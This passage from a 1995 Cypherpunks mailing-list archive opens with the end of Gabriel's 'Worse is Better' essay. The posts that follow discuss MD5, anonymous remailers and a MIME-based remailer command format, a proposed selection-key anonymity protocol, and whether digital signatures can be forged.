interpret. Some have called C a fancy assembly language. Both early Unix and C
compilers had simple structures, are easy to port, require few machine
resources to run, and provide about 50%--80% of what you want from an operating
system and programming language.

Half the computers that exist at any point are worse than median (smaller or
slower). Unix and C work fine on them. The worse-is-better philosophy means
that implementation simplicity has highest priority, which means Unix and C are
easy to port on such machines. Therefore, one expects that if the 50%
functionality Unix and C support is satisfactory, they will start to appear
everywhere. And they have, haven't they?

Unix and C are the ultimate computer viruses.

A further benefit of the worse-is-better philosophy is that the programmer is
conditioned to sacrifice some safety, convenience, and hassle to get good
performance and modest resource use. Programs written using the New Jersey
approach will work well both in small machines and large ones, and the code
will be portable because it is written on top of a virus.

It is important to remember that the initial virus has to be basically good. If
so, the viral spread is assured as long as it is portable. Once the virus has
spread, there will be pressure to improve it, possibly by increasing its
functionality closer to 90%, but users have already been conditioned to accept
worse than the right thing. Therefore, the worse-is-better software first will
gain acceptance, second will condition its users to expect less, and third will
be improved to a point that is almost the right thing. In concrete terms, even
though Lisp compilers in 1987 were about as good as C compilers, there are many
more compiler experts who want to make C compilers better than want to make
Lisp compilers better.

The good news is that in 1995 we will have a good operating system and
programming language; the bad news is that they will be Unix and C++.

There is a final benefit to worse-is-better. Because a New Jersey language and
system are not really powerful enough to build complex monolithic software,
large systems must be designed to reuse components. Therefore, a tradition of
integration springs up.

How does the right thing stack up? There are two basic scenarios: the ``big
complex system scenario'' and the ``diamond-like jewel'' scenario.

The ``big complex system'' scenario goes like this:

First, the right thing needs to be designed. Then its implementation needs to
be designed. Finally it is implemented. Because it is the right thing, it has
nearly 100% of desired functionality, and implementation simplicity was never a
concern so it takes a long time to implement. It is large and complex. It
requires complex tools to use properly. The last 20% takes 80% of the effort,
and so the right thing takes a long time to get out, and it only runs
satisfactorily on the most sophisticated hardware.

The ``diamond-like jewel'' scenario goes like this:

The right thing takes forever to design, but it is quite small at every point
along the way. To implement it to run fast is either impossible or beyond the
capabilities of most implementors.

The two scenarios correspond to Common Lisp and Scheme.

The first scenario is also the scenario for classic artificial intelligence
software.

The right thing is frequently a monolithic piece of software, but for no reason
other than that the right thing is often designed monolithically. That is, this
characteristic is a happenstance.

The lesson to be learned from this is that it is often undesirable to go for
the right thing first. It is better to get half of the right thing available so
that it spreads like a virus. Once people are hooked on it, take the time to
improve it to 90% of the right thing.

A wrong lesson is to take the parable literally and to conclude that C is the
right vehicle for AI software. The 50% solution has to be basically right, and
in this case it isn't.

But, one can conclude only that the Lisp community needs to seriously rethink
its position on Lisp design. I will say more about this later.

rpg@lucid.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Mon, 6 Feb 95 22:37:39 PST
To: philip@cs.brandeis.edu (Philip Trauring)
Subject: Re: MD5 coding
In-Reply-To: <ab5c1c670202100461ba@[129.64.123.61]>
Message-ID: <199502070637.BAA17973@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



> I am looking to put together an MD5 message digest program and have
> extracted the MD5.c and MD5.h files from PGP(excerpt of the MD5.h file
> below) but I'm not sure how it all works. Can someone who is familiar with
> the functions and the data structure please e-mail me with a bit of
> guidance as to what each one does and how to implement it. If anyone can
> lead me to a good description of the processes involved I would appreciate
> that too. Thanks.

Better than looking at sources, look for the file rsa.doc avail. from a lot
of crypto/security ftp-sites... specifically something called the MD5-A RFC
...? It explains the algorithm pretty well, and is what I used to write my
own assembler implementation with... better to work from an explanation of
the algorithm than from sources which you may or may not understand what is
going on.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Tue, 7 Feb 95 02:07:17 PST
To: rfdutcher@igc.apc.org
Subject: Corporate Fascism, Rand, Greens, Oh My!
In-Reply-To: <199501302310.PAA13622@mail.igc.apc.org>
Message-ID: <199502071005.CAA25848@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I just saw this older message as I waded through the 700 messsages
which accumulated during my absence (and since my return, too). IO
know there will be some who see no crypto relevance in this, but
that's just too bad. I've seen endless OS flame war posts, endless
flames about "can't we get back to crypto?" (often from the OS
flamers, ironically), so my foray into anarcho-capitalism is at least
as related to Cypherpunks issues. 

Besides, I want to respond to my old friend Rich.

Richard F. Dutcher wrote:

> Do you assume privacy and protection from arbitrary power are solely 
> libertarian concerns?  If so, educate yourself and check out the ACLU 
> and Amnesty International ...
> 
> I even know lots of cyrpto-anarcho-libbers [or whatever Tim May is 
> calling them nowadays ;-] who are willing to concede, under pressure, 
> that unfettered corporations can be as dangerous to freedom as any 
> government.

It doesn't even take any pressure for me to concede this, although
there are some subtleties about what "unfettered" means, and what
options corporations have to stifle competitors by using State power.

The Randian ideal (well, "ideal" for many of us who cut our teeth on
"Atlas Shrugged" while future commie wimp-simps were studying
"Johnathan Livingston Seagull" :-}) is seldom met. Even in Rand and
Heinlein we find plenty of allegedly free-market corporations who cozy
up to the State, buy elections, impose bureaucratic laws they
know will stifle new competitors, etc. We saw them in Rand, with the
"Anti Dog-eat-Dog Law," and the various slacker companies, and we
certainly see it in the real world. Corporations that hire the police
to break strikes by breaking heads (and I mean strikers who are merely
not working, or who are walking a line); there's strike violence on
both sides, of course. Or corporations who pay bribes to bypass laws
(even "reasonable" laws that any libertarian would support, such as
law involving the dumping of toxic waste into streams). Or
corporations that use the legal and patent system to suppress
upstarts. (I could name a company I happen to know quite well, which
basically stole its starting seed products from the company it sprung
from, then later used the legal system and government laws to cleverly
stop some others from doing the same thing.)

As Mussollini so cogently put it, "corporatism is fascism." A State
that blesses Fiat and suppresses competitors, or that blesses Lockheed
through bailouts and exemptions from laws, is basically fascist.
(Fascist is a term with a socioeconomic meaning, not merely an epithet
or adjective.)

(As many of you may imagine, much of the hype about the Information
Superduperhighway--more suitably called the Infobahn--is explicity
totatalitarian, with large corporations slavering to get a piece of
the action! I have no problems with Cyberdyne Systems, for example,
installing new T2 links to where customers want more bandwidth. But
the I-way is a large boondoggle, with sociocrats and "cybercrats"
(apparently a new term from Mark Stahlman, which I like) trying to
plan the optimal society and with corporation pleding to "make the
packets run on time." Ughh!)

Make no mistake about it, strong crypto, what I call crypto anarchy,
will have as great an effect on corporate sizes, structures, and
behaviors as it will have on governments. Maybe more of an effect.

I'm glad to see Rich Dutcher on our list, as we need more folks of
that persuasion. (I can happily coexist with thoughtful leftists who
have some appreciation of the issues--Dave Mandl also comes to mind.
The ones I can't abide are the ignoramuses who blithely speak of
redistributing income and have grade school understandings of markets
and economics. They have no idea of the corporate fascism that comes
from state-run economies. But then the same applies to libertarians
with a lack of understanding.)

> So encrypt away, guys, and I'll keep telling *my* compatriots that no, 
> "the modem in Washington" didn't rig all the vote-counting computers 
> in the last election.  I'm relying on you-all to keep it that way, 
> while others try to make/keep voting meaningful.  It's called 
> division of labor ...

> Rich Dutcher, San Francisco Greens

> "That's libertarians for you - anarchists who want police protection from their slaves."
>                           Kim Stanley Robinson, "Green Mars"

That's a good one! I loved "The Gold Coast" by him, so maybe I'll have
to read this one (though I've skipped the recent crop of "Mars" books).


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Tue, 7 Feb 95 02:16:44 PST
To: skaplin@mirage.skypoint.com (Samuel Kaplin)
Subject: Re: Is the remailer crisis over?
In-Reply-To: <CeSBlKjqRGfK078yn@mirage.skypoint.com>
Message-ID: <199502071015.CAA26435@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Samuel Kaplin wrote:
> 
> Well folks as of 11:30 on 1-30-94 there are 14 remailers with uptimes
> greater than 99%. What's the consensus...Is the remailer crisis over?
> 

It's great that it's on the upswing again, as it was dipping
pretty low a few weeks back. 

I don't think the "crisis" will be over until there are at least 50
remailers, spread over at least five countries. Each supporting the
usual features, and with some reasonable traffic.

With luck, and with "remailer accounts," this could happen by this
summer.

But it's a good sign.

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stig@hackvan.com (Stig)
Date: Tue, 7 Feb 95 02:43:21 PST
To: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Subject: Re: The Rise of "Worse is Better"...
In-Reply-To: <m0rbm8e-0006DaC@hackvan.com>
Message-ID: <m0rbnN3-0006DaC@hackvan.com>
MIME-Version: 1.0
Content-Type: text/plain


L. McCarthy wrote:
> 
> Why did you send this to cypherpunks ?  I don't see any crypto/privacy
> relevance.

No crypto/privacy relevance.  Software methodology relevance.  It makes
points about why it's better to get 50% out the door immediately than to be
overly stuck on doing everything "The Right Way"...

That the "Worse is Better" approach has better survival characteristics than
"The Right Way" approach is applicable to the mission(s) of the cypherpunks
is it not?  Of course, in the case of the cypherpunks, it may be preaching
to the converted and if that is the case, then I apologize...

> Perhaps you're hoping to revive the latest pointless James Donald flame
> war ?

I only subscribe to cp-lite, so I don't have to read all the rehashed
flames.  I suppose that I should be glad that I missed it...

    Stig




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Tue, 7 Feb 95 02:44:11 PST
To: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Subject: Remailer Scripting Languages
In-Reply-To: <ab54891b070210044757@[132.162.201.201]>
Message-ID: <199502071042.CAA27653@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Jonathan Rochkind wrote:

> At 6:55 PM 01/31/95, Robert Rothenberg wrote:
> >Without quoting the entire message, I think I better solution, in terms of
> >ease to implement as well as conserving bandwidth would be to have a
> >sophisticated remailer script-language.
> 
> Yeah, this is really an excellent idea, that I don't see happening any time
> soon. Although of course if anyone wants to write code for such a beast,
> that would be really excellent.  If someone gets around to writing it,
> it'll happen, but it would be a fairly big project, so I wouldn't hold my
> break.  Safe TCL, anyone?

I certainly support this kind of idea, and have for a long time.
Crypto is well-suited for the "small languages" point of view (and the
competing points of view for object-oriented systems, production
systems, etc.).

Anything to abstract away the grungy details and hide them. TCL and
Perl are steps, and Strick (Henry Strickland) has of course been
working on his Skronk system, which does some of this.

Python is another possibility.

Some of the graphical-oriented languages like Prograph might be
useful. And I still think Smalltalk has promise, as many financial
institutions are using it to model and automate financial
transactions, which have obvious similarities to our crypto projects. 

The real obstacles are time and money. Corporations and banks doing
this work can put several people on these projects for several years,
while most Cypherpunks projects have to be fit in between "Data
Structures 202" and "Ren and Stimpy."

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Mon, 6 Feb 95 14:01:26 PST
To: cypherpunks@toad.com
Subject: Selection key crypto protocol trial balloon
Message-ID: <gate.wJ85Zc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain



Before replying to Tim's comments on Mike Ingle's new directions for anonymity
which, I think, are based on a misunderstanding of what Mike was essentially
positing, here's my (slightly lengthy) take on the Selection Key Crypto 
protocol. Please read it before criticising, as I've already done that...

Mp is the plaintext message. Alice encrypts it with Bob's public key:
Mc = E.kpub (M)                                 [1]

She sends Mc to Hermes, the Hoarder of Messages. Hermes also receives 
Alice's identity string (Ia) which will probably be anonymous, but let's 
assume it's not. Now's the tricky bit. Hermes adds Mc to its message store, S:
S' = G (S, Mc)                                  [2]

The key here is G, the Digest function, which has to spread M over S (with a 
variation of the Fourier function, perhaps), and not just append it, so that
the _only_ way it can be extracted is with Bob's selection key, which Bob
transmits to Hermes along with an involuntary identity string (Ib) to get:
Mx = H.ksel (S')                                [3]

where H.ksel is the Regurgitate function applied with Bob's selection key,
and Mx is _not_ the original encrypted message, Mc, nor the plaintext Mp.

Finally Bob decrypts Ms with his _private_ key (or possibly a variation, which
we'll call v(kpri)), to get the plaintext:
Mp = D.v(kpri) (Ms)                                [4]

So the possible crypto operations are:
Mp = D.kpri (E.kpub(Mp))
Mp = D.v(kpri) (Mx)  where v(x) may be = x
Mx = H.ksel (S')
And the Digest function, S' = G (S, E.kpub(Mp))
Note that only the private key kpri, and its variation v(kpri) are private. 
The other two are public.

Now for the obvious criticisms:
1. after [1] Hermes can store Alice's identity (Ia) in a dark grey dossier,
   and match it to Bob's identity (Ib) and the extracted message (Mx). Nope.
   The premise of this scheme is that Mx doesn't look like Mc at all, and that
   G (in [2]) dissolves the original message into a sludge, from which Mx
   somehow emerges, NOT that it chops Mc into bits with Ia on a little nametag
2. after [1] Hermes can store Ia along with the message and feed [Mc, Ia]
   to [2] in the hope that it will reappear in [3] as [Mx, Ia']. Well, the
   digest function has prevent this, possibly by making the regurgitated
   thing so different from the input that matching Ia to Ia' will be 
   impossible. Of course, Bob probably won't grok [Mx, Ia'] in [4]
3. Hermes gets Bob's identity string (Ib) in [3]. Et alors? As that is 
   incidental, not required to extract the message (unlike in a remailer, where
   that identity string - e-mail address, return block, whatever is _precisely_
   what is required for a message to reach), it's irrelevant. The _real_
   identity is the selection key, which does not correlate to any cyberspatial
   location. See further on traffic analysis.
4. ksel, Bob's selection key, is obviously not private, at least not to Hermes,
   and may as well be public. So anyone can extract the message intended for
   Bob (which reinforces my previous point that Ib is irrelevant). But what
   they extract is Mx, which is not the plaintext. To get the plaintext you
   need not the selection key but Bob's private key, which only Bob has.
5. The Digest function [2-3] has to be robust, i.e. it shouldn't puke if
   it's got lots of messages, and should be able to extract the right one
   in any state. Well, yes, that's tough.

Traffic analysis
The difference between the SKC model and remailers
  Alice --> (Raven, the remailer net) --> Bob   .... multiplied ad infinitum
  Alice --> (Hermes) --> Bob
                     --> Carol, David, the whole world as the 
                         selection key is public
The remailer net is essentially one-to-one, making traffic analysis easier
and limiting Bob's deniability - if the last remailer says it's gone to Bob,
it was _for_ Bob.

The broadcast model essentially increases deniability - they all got it,
any of them could have seen it if they had the key, and you'll only know that
I had the private key with thumb-screws. But they all _get_ it, so bandwidth
is huge.

The SKC model is a compromise. It increases deniability - anyone could have
got it, they all have the selection key, they could only have seen it with the
private key etc. It cuts bandwidth. But it's not a data haven, at least not
as earlier discussed.

The data haven in its latest guise has the same deniability as SKC, and the
same prerequisites that aid recipient protection (anon anon ftp etc). But it
doesn't protect the sender. If the haven is in collusion with remailers that
Alice used to post, it can link her to the message and possibly to Bob. With
SKC, even with the collusion of remailers the link gets lost in digestion.
Also, Bob (or anyone) can frequently extract stuff with the selection key,
perhaps garbage if Hermes is misbehaving or without messages for Bob.

Of course when (and how) Hermes is to expire messages is part of the problem
of the various functions involved.

Comments?


-----------------------------------------------------------------------------
For Electric Dreams subscriptions and back issues, send a mail to
rishab@arbornet.org with 'get help' as the message Subject.

Rishab Aiyer Ghosh          rishab@dxm.ernet.in           rishab@arbornet.org
Vox +91 11 6853410 Voxmail 3760335       H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@aeinet.com>
Date: Tue, 7 Feb 95 06:50:23 PST
To: lce@wwa.com>
Subject: RE: Source code for Applied Cryptography
Message-ID: <Chameleon.4.01.950207065030.jcorgan@comet.aeinet.com>
MIME-Version: 1.0
Content-Type: text/plain


>I think it's been mentioned that the source code for Bruce
>Schneier's "Applied Cryptography" was available via ftp.  
>
>Would someone be so kind as to post some locations where it can be
>obtained?

This web page isn't the complete set, but points to most of it anyway:

http://www.openmarket.com/info/cryptography/applied_cryptography.html

==
Johnathan Corgan       "Violence is the last refuge of the incompetent."
jcorgan@aeinet.com                    -Isaac Asimov
WWW:                     ftp://ftp.netcom.com/pub/jc/jcorgan/home.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Usenet Autoresponder <usenet@netnet2.netnet.net>
Date: Tue, 7 Feb 95 05:13:54 PST
To: cypherpunks@toad.com
Subject: Re: lwall
Message-ID: <199502071312.HAA26488@netnet2.netnet.net>
MIME-Version: 1.0
Content-Type: text/plain


DO NOT PANIC!  REMAIN CALM!  READ *ALL* OF THIS MESSAGE BEFORE GETTING UPSET!

Your Usenet test article was received here at the news gateway machine for
NetNet, Inc. in Green Bay Wisconsin.  We provide wholesale internet services
for all kinds of services for internet providers and end-users.  From WWW 
pages, newsfeeds, telnet accounts, ppp services, to fully maintained POP's
in your area. 

For sales info please address sales@netnet.net.  Technical and news support to
shane@netnet.net

For an auto-reply of gereral services and prices email info@netnet.net

If you're a newsadmin and you'd like to run your own autoresponder, this one
is available from ftp://ftp.cccd.edu/pub/usenet/innautorespond.

If you want to suppress this message in the future, include the word "ignore" 
in the Subject: header of any subsequent articles posted to *.test.  You could
also post your test articles with a Distribution: header of "local" to prevent
them from leaving your local machine, or you could also ask your local 
newsadmin to create a local *.test group that will not propagate outside of 
your organization.

There are typically 5 possible reasons why you were sent this e-mail message:

1) You intentionally posted a Usenet news article to a *.test newsgroup.  
These newsgroups exist so you can verify that your articles are being 
propagated correctly.  When your article arrives here, we send you this message
as confirmation.  We will only send you ONE e-mail reply for each of your test
articles that we see.

2) You unintentionally posted a Usenet news article to a *.test newsgroup.  
This is a bit of net.childishness caused by a Followup-To: header directing all
replies into a *.test newsgroup.  This is done by somebody upset with the
content of a discussion thread who wants to "punish" anybody who replies to his
message.  Your reply will be sent to *.test instead of the original newsgroup,
and you will start receiving autoresponder messages similar to this one that
you didn't ask for.  To avoid this in the future, look for a Followup-To:
header and make sure it's appropriate before replying to any articles.

3) You were a victim of a Reply-To: header directing your e-mail into a *.test
newsgroup via a mail->news gateway.  Similar to 2) above.

4) Somebody has forged a posting in your name to one of the *.test newsgroups.
To avoid this in the future, use better net.etiquette and you will make fewer
net.enemies.  If you want to try and identify the forger, use the following
procedure.  Make a legitimate posting to the same *.test newsgroup that the
forger used.  We will send you an e-mail reply.  Compare the Path: header from
this legitimate reply with the Path: header from the forgery.  The front
part of the two headers will be the same or topologically similar path to
your site.  Where the forged header becomes substantially different can
provide clues to where the forger lives.  Note that if you receive multiple
newsfeeds you may need to repeat this process several times so you can discover
all legitimate paths between our site and yours.  Once you think you've
identified the forger's site, try sending POLITE e-mail to the newsadmin/
sysadmin/postmaster explaining the situation.

5) You issued a cancel control message to a *.test newsgroup.  Some users
dislike autoresponses for cancel messages, but the newsadmins here think it
can be a valuable diagnostic tool for verifying cancel propagation.  If you
don't like it, use the "delete" key in your mail client!

All headers plus at most 10 lines of user text from your original article are
reproduced below for your perusal:

questions to shane@netnet.net
complaints to /dev/null

------------------------------- your post follows ----------------------------
Path: netnet2.netnet.net!news.sprintlink.net!howland.reston.ans.net!agate!overload.lbl.gov!emf.emf.net!hilbert.dnai.com!nbn!miwok!news.zeitgeist.net!ack.berkeley.edu!not-for-mail
Subject: lwall
Message-ID: <PINE4545-dhfsdkjc@ack.berkeley.edu>
NNTP-Posting-Host: ack.berkeley.edu
Organization: cypherpunks
Lines: 2
From: cypherpunks@toad.com
Distribution: world
Newsgroups: alt.test
Date: 6 Feb 1995 19:34:19 GMT

test
test




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Tue, 7 Feb 95 04:46:44 PST
To: root <root@einstein.ssz.com>
Subject: Re: dna ink
In-Reply-To: <199502070417.WAA01434@einstein.ssz.com>
Message-ID: <9502071246.AA06847@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



root says:
> This is the same problem that arose with the original idea of seals once
> the skills of metalworking became commen enough. By the 1500's it was
> nearly impossible to keep a seal confidential more than a few weeks until
> somebody got a impression and built a copy.

Seals were duplicatable from the start. You just needed clay and a
seal made with the oritinal if you wanted to forge them -- fairly
common stuff. Signatures have been duplicatable from the start, too.

Signatures and seals are NOT truly authenticating technologies. They
are just a legal mechanism for an entity to demonstrate that it has
read and agreed to the terms on a document. It was always assumed that
someone might forge a signature, which is why if you had a document
where you cared that people might disclaim their signature, you got
people who could testify to the signature to witness the signing.

Digital "signatures" are the first real unforgeable authentication
technology mankind has developed.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Tue, 7 Feb 95 05:22:55 PST
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: Cooperation
In-Reply-To: <9502062043.AA05429@snark.imsi.com>
Message-ID: <9502071321.AA19736@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Mon, 06 Feb 1995 15:43:46 -0500
    From: "Perry E. Metzger" <perry@imsi.com>

    I'd say that it would work far better if things were changed to MIME
    formats. You would send a message by recursively encapsulating your
    message to be remailed inside a MIME message. Simple and clean...

Personally, I vastly prefer that things that can be handled with
header lines be handled that way.

MIME may be general and handle messages with mixed data, but the
Big-Ugly-Block style that everything seems to be moving to is, well,
overly big and overly ugly.

When the data in a message is of a single type, adding all of this
ugly MIME bulk is neither simple nor clean.  It's artificial
complexity and needless blecherousness.

Recursive encapsulation needn't affect how any particular level looks.

			Rick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lce@wwa.com (Larry E)
Date: Tue, 7 Feb 95 06:34:09 PST
To: cypherpunks@toad.com
Subject: Source code for Applied Cryptography
Message-ID: <sGuDlG9s1Si8075yn@wwa.com>
MIME-Version: 1.0
Content-Type: text/plain


I think it's been mentioned that the source code for Bruce
Schneier's "Applied Cryptography" was available via ftp.  

Would someone be so kind as to post some locations where it can be
obtained?

Thanks for the help.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 7 Feb 95 08:37:19 PST
To: cypherpunks@toad.com
Subject: MIME based remailing commands
Message-ID: <199502071636.IAA15674@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: "Perry E. Metzger" <perry@imsi.com>
> 
>     I'd say that it would work far better if things were changed to MIME
>     formats. You would send a message by recursively encapsulating your
>     message to be remailed inside a MIME message. Simple and clean...

Here is an example of how such a mesage might look.  I created it using
the safe-tcl scripting language.  Interestingly, safe-tcl can to a
considerable extent be considered a tcl extension to let you work easily
with mime messages.  It makes it easy to create and parse them.

The whole message could be encrypted and marked with the "Encrypted: PGP"
header as we do now, or when the new PGP/MIME standard is finalized then
that could be followed.

I made up two new content types for this, one to hold the composite
multipart message, and one to hold the remailer commands themselves.
Although these types are not implemented, I think it would be very easy
to make a remailer that would use this structure, built out of safe-tcl.
(The batching and latency would not be trivial, but the basic remailing
would be easy.)

Hal

> To: hfinney@shell.portal.com
> Subject: No subject
> Mime-Version: 1.0
> Content-Type: multipart/remail; boundary="----- =_792174086"
> Content-ID: <1471.792173861.3@cryo>
>  
> ------- =_792174086
> Content-Type: application/remail-commands
> Content-ID: <1471.792173861.1@cryo>
> 
> Latency: 2 hours
> Minimum-Batch-Size: 5 messages
> Anon-Send-To: cypherpunks@toad.com
> Subject: Example of remailed message
>  
> ------- =_792174086
> Content-Type: text/plain
> Content-ID: <1471.792173861.2@cryo>
>  
> This is a message which is being sent to the mailing list.
> It is being remailed via a MIME-based structure where two new content types
> are defined: multipart/remail and application/remail-commands.  The
> multipart/remail type is supposed to be composed of two parts, the
> application/remail-commands part which has remailer commands, and the
> other part which is the "payload" to be remailed.
>  
> ------- =_792174086--




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jason cooper <jcooper@acs.ucalgary.ca>
Date: Tue, 7 Feb 95 07:45:14 PST
To: Stig <stig@hackvan.com>
Subject: Re: The Rise of "Worse is Better"...
In-Reply-To: <m0rbm8e-0006DaC@hackvan.com>
Message-ID: <Pine.3.89.9502070839.B31143-0100000@acs6.acs.ucalgary.ca>
MIME-Version: 1.0
Content-Type: text/plain


I like.  I guess I'm basically in with the New Jersey crowd.  Anybody 
else?

-----------------------------------------------------------------
  "The meek shall inherit the earth...   Fortunately, the rest of
us will upgrade to the new version, which is supposed to come out
later this year."
 
Jason Cooper                              jcooper@acs.ucalgary.ca






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@tower.techwood.org (Anonymous)
Date: Tue, 7 Feb 95 09:09:02 PST
To: cypherpunks@toad.com
Subject: Re: Is the remailer crisis over?
In-Reply-To: <199502071015.CAA26435@netcom9.netcom.com>
Message-ID: <199502071708.JAA17106@tower.techwood.org>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@netcom.com (Timothy C. May) wrote:

> I don't think the "crisis" will be over until there are at least 50
> remailers, spread over at least five countries. Each supporting the
> usual features, and with some reasonable traffic.
> 
> With luck, and with "remailer accounts," this could happen by this
> summer.

I think the increase in remailers is partly due to better
protection/privacy/anonymnity for remailer operators, which is a good
thing, but I worry about puting all our eggs in one basket.  Nearly 40%
of the remailers now are either on c2.org or through John Perry's and
Matt Ghio's MXing thing.  I don't know much about the latter, but
Sameer's net connection is not very reliable and disconnects frequently.
 It seems these two points of failure could cause serious problems for
the remailer network as a whole.  Not to mention that these two systems
would be prime targets for anyone who wants to do traffic analysis...

The remailer crisis is far from over.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Keith Henson <keith@filoli.com>
Date: Tue, 7 Feb 95 09:53:15 PST
To: cypherpunks@toad.com
Subject: Re: dna ink
Message-ID: <199502071740.JAA26640@mentat.filoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Re signin in blood, I heard last year that the Army is requiring
a drop of blood on enlistment papers.  It is no some kind of pack
with the devil :-) but if all they ever find of you is a wrist 
bone, they want to be able to match DNA.  Keith





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Katy Kislitzin <ktk@anemone.corp.sgi.com>
Date: Tue, 7 Feb 95 10:32:33 PST
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: preliminary cypherpunks announcement
In-Reply-To: <199502070311.WAA03160@bwh.harvard.edu>
Message-ID: <199502071830.KAA29964@anemone.corp.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: Adam Shostack <adam@bwh.harvard.edu>
 > Is the march meeting scheduled yet?  I'm trying to plan to be out for
 > both CFP & the cypherpunks meeting, but have paid no attention to when
 > they're held, since I live on the wrong coast to attend most of them.
 > 
 > Adam
 > 
 > -- 
 > "It is seldom that liberty of any kind is lost all at once."
 > 						       -Hume

 We have the usual 2nd Saturday (March 12) meeting planned, but I
 *definitely* think cpunks should do something around the cfp
 conference.  last year we did an informal in-the-hotel-halls meeting,
 but since this cfp is in the bay area....  I propose keeping the
regular March and April mtgs, and adding a cpunks dinner &&|| BOF at
cfp.  other ideas?

--kt
 ps CFP is March 28-31, at the sf airport marriot in burlingame ca.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Blossom <eb@comsec.com>
Date: Tue, 7 Feb 95 11:57:38 PST
To: rrothenb@ic.sunysb.edu
Subject: dna ink
In-Reply-To: <199502061003.FAA01784@libws4.ic.sunysb.edu>
Message-ID: <199502071902.LAA27173@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu> writes:

> ...probably will be until DNA cloning becomes cheap and accessible...

Can you say "Polymerase Chain Reaction"?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Tue, 7 Feb 95 11:28:01 PST
To: cypherpunks@toad.com
Subject: Re: dna ink
In-Reply-To: <9502071246.AA06847@snark.imsi.com>
Message-ID: <199502071926.LAA21751@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: "Perry E. Metzger" <perry@imsi.com>

   Digital "signatures" are the first real unforgeable authentication
   technology mankind has developed.

Impossibility is a pretty strong concept, and here, as elsewhere, it's
an exaggeration.  Digital signatures are not unforgeable.  If you
steal the private key, you can forge signatures.  The unforgeability
is exactly as great as the strength of the container where the private
key lies.  The issue of incarnation, if you will, is perhaps the
single most important issue for actual deployment.

It's a matter of economics.  The cryptographic barrier is
insurmountable, but it's not the only barrier.  So don't try to breach
the cryptography; try to breach one of the other elements of the
system.

[Perry, I promise it's not personal; it just _seems_ like I'm
nit-picking on everything you write this week.]

A remark on the meaning of forgery.  Let me rewrite what Perry said:

   Digital "signatures" are the first authentication technology
   mankind has developed where forgery is impossible to detect.
   
An indistinguishable signature can still be a forged signature.  A
forged signature is one that is made by the wrong person.  If the
wrong person gets the private key, signatures made by that person are
forgeries, even though nobody can tell them apart.

This point is not merely pedantic.  The concept of forgery adheres to
the person committing the act, not the act itself.  A piece of data
which presents itself as a signature, but which does not pass the
verification process, is not a forged signature but an invalid one.

